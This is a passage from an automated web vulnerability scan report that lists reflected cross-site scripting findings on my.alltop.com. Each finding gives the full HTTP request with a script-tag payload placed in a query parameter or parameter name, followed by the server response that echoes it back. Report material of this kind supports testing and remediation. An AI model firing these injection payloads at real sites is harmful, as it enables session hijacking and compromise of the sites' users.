<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/z?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001DA)%3C/script%3Edb047"><script>alert(1)</script>bab0c53fb7e" method="post" accept-charset="utf-8">
...[SNIP]...

1.261. http://my.alltop.com/css/ ['"--> parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /css/

Issue detail

The value of the '"--></style></script><script>netsparker(0x0000A6)</script> request parameter is copied into the HTML document as plain text between tags. The payload 66854<script>alert(1)</script>bbcc40424a5 was submitted in the '"--></style></script><script>netsparker(0x0000A6)</script> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/?'"--></style></script><script>netsparker(0x0000A6)</script>66854<script>alert(1)</script>bbcc40424a5 HTTP/1.1
Referer: http://my.alltop.com/css/style.css
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Date: Tue, 08 Mar 2011 20:49:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:17 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:21 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:21 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22781

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
</script>66854<script>alert(1)</script>bbcc40424a5" method="post" accept-charset="utf-8">
...[SNIP]...

1.262. http://my.alltop.com/css/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /css/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba05e"><script>alert(1)</script>f54e0abc780 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/?ba05e"><script>alert(1)</script>f54e0abc780=1 HTTP/1.1
Referer: http://my.alltop.com/css/style.css
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Date: Tue, 08 Mar 2011 20:48:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:07 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:08 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:48:08 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22561

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/css/?ba05e"><script>alert(1)</script>f54e0abc780=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.263. http://my.alltop.com/css/ [nsextt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /css/

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d275b"><script>alert(1)</script>80b8e549f3e was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000003)%3C/script%3Ed275b"><script>alert(1)</script>80b8e549f3e HTTP/1.1
Referer: http://my.alltop.com/css/style.css
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Date: Tue, 08 Mar 2011 20:49:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:07 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:07 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:07 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22897

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/css/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000003)%3C/script%3Ed275b"><script>alert(1)</script>80b8e549f3e" method="post" accept-charset="utf-8">
...[SNIP]...

1.264. http://my.alltop.com/img/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /img/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54df3"><script>alert(1)</script>872f0925380 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /img/?54df3"><script>alert(1)</script>872f0925380=1 HTTP/1.1
Referer: http://my.alltop.com/img/search-bttn.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Date: Tue, 08 Mar 2011 20:49:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:12 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:12 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:12 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22561

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/img/?54df3"><script>alert(1)</script>872f0925380=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.265. http://my.alltop.com/img/ [nsextt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /img/

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b689"><script>alert(1)</script>9766fd2ac50 was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /img/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EB)%3C/script%3E3b689"><script>alert(1)</script>9766fd2ac50 HTTP/1.1
Referer: http://my.alltop.com/img/search-bttn.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Date: Tue, 08 Mar 2011 20:51:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:01 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:02 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:02 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22897

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/img/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EB)%3C/script%3E3b689"><script>alert(1)</script>9766fd2ac50" method="post" accept-charset="utf-8">
...[SNIP]...

1.266. http://my.alltop.com/img/mugs/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /img/mugs/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3624"><script>alert(1)</script>a2afa10dbaf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /img/mugs/?c3624"><script>alert(1)</script>a2afa10dbaf=1 HTTP/1.1
Referer: http://my.alltop.com/img/mugs/celeb-mug-adamengst.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Date: Tue, 08 Mar 2011 20:49:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:17 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:17 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:17 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22581

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/img/mugs/?c3624"><script>alert(1)</script>a2afa10dbaf=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.267. http://my.alltop.com/img/mugs/ [nsextt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /img/mugs/

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 184ca"><script>alert(1)</script>e3d7327c7f1 was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /img/mugs/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F6)%3C/script%3E184ca"><script>alert(1)</script>e3d7327c7f1 HTTP/1.1
Referer: http://my.alltop.com/img/mugs/celeb-mug-adamengst.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Date: Tue, 08 Mar 2011 20:51:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:18 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:18 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:18 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22917

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/img/mugs/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F6)%3C/script%3E184ca"><script>alert(1)</script>e3d7327c7f1" method="post" accept-charset="utf-8">
...[SNIP]...

1.268. http://my.alltop.com/scottkelby [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /scottkelby

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4737e"><script>alert(1)</script>79b85a68b30 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /scottkelby?4737e"><script>alert(1)</script>79b85a68b30=1 HTTP/1.1
Host: my.alltop.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=160012002.1299617018.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-414054026-1299617018360; alltop_v=5b0b0493d420fb34fe2dbc09755a84c8; alltop_r=159_ALLTOP_TOPIC_ID; sifrFetch=true; __utma=160012002.1234645092.1299617018.1299617018.1299617018.1; __utmc=160012002; __utmb=160012002.5.9.1299617157503; __qseg=Q_D|Q_T|Q_2891|Q_2782|Q_2781|Q_2369|Q_2361|Q_2360|Q_2359|Q_2358|Q_2357|Q_2356|Q_2342|Q_1213|Q_1153|Q_1152|Q_1151|Q_1150|Q_1145|Q_1144|Q_982; __csref=http%3A%2F%2Fsharepoint.alltop.com%2Ffavicon.icoa6c4d%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E365c9a34273; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=i4a5ogk64978pgcjhn10qfejb6

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:46:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:46:32 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=i4a5ogk64978pgcjhn10qfejb6; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:46:32 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=159_ALLTOP_TOPIC_ID_22441; expires=Mon, 06-Jun-2011 20:46:32 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 242063

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/scottkelby?4737e"><script>alert(1)</script>79b85a68b30=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.269. http://my.alltop.com/scripts/ ['"--> parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /scripts/

Issue detail

The value of the '"--></style></script><script>netsparker(0x0000AB)</script> request parameter is copied into the HTML document as plain text between tags. The payload a494e<script>alert(1)</script>2dee83bf73c was submitted in the '"--></style></script><script>netsparker(0x0000AB)</script> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /scripts/?'"--></style></script><script>netsparker(0x0000AB)</script>a494e<script>alert(1)</script>2dee83bf73c HTTP/1.1
Referer: http://my.alltop.com/scripts/sifr/sifr.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Date: Tue, 08 Mar 2011 20:49:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:19 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:19 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:19 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22797

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
</script>a494e<script>alert(1)</script>2dee83bf73c" method="post" accept-charset="utf-8">
...[SNIP]...

1.270. http://my.alltop.com/scripts/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /scripts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c1ab"><script>alert(1)</script>7e7dbe994c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /scripts/?4c1ab"><script>alert(1)</script>7e7dbe994c5=1 HTTP/1.1
Referer: http://my.alltop.com/scripts/sifr/sifr.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Date: Tue, 08 Mar 2011 20:48:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:07 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:07 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:48:07 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
